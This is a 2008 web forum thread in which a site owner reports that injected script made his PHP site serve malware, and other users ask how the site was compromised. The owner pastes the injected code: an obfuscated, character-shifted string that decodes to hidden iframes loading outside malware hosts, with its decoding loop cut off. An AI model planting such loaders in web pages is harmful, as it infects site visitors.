site hacked by injecting script

Forum Moderators: coopster

Message Too Old, No Replies

site hacked by injecting script

site hacking - protection required

blueguitar

8:01 am on Jul 4, 2008 (gmt 0)

My site <snip> has been hacked recently by injecting the following script . This script starts downloading malware,badware as soon as the page is resolved in the browser . Hosting guys say they cannt do any thing about it and requested upgrade script .
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .

Some body may please let me know the solutions.

for(var i=0;i </script>

[edited by: blueguitar at 8:39 am (utc) on July 4, 2008]

[edited by: dreamcatcher at 2:03 pm (utc) on July 4, 2008]
[edit reason] No urls please! [/edit]

paulmadillo

12:22 pm on Jul 4, 2008 (gmt 0)

URL's still there on the top line mate.

There are limitless ways that your site may have been compromised.
Where is the malicious script? has it been physically placed on your server into one of the files or is it coming from a database say?

blueguitar

5:21 am on Jul 5, 2008 (gmt 0)

Yes the script has been physically installed in some of the pages .
here is the script "<script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/jogp0dpvoufs0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?=jgsbnf!tsd>#iuuq;00pqfsbujwf/dd0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i </script> "

url is already removed . where can u see it ?

henry0

2:37 pm on Jul 5, 2008 (gmt 0)

How may a user interact with your site?
list how:
Forms etc..
Data:
is $_GET used to pass data feeding a DB query, etc...

if not any user may interact with your site you might want looking ISP side.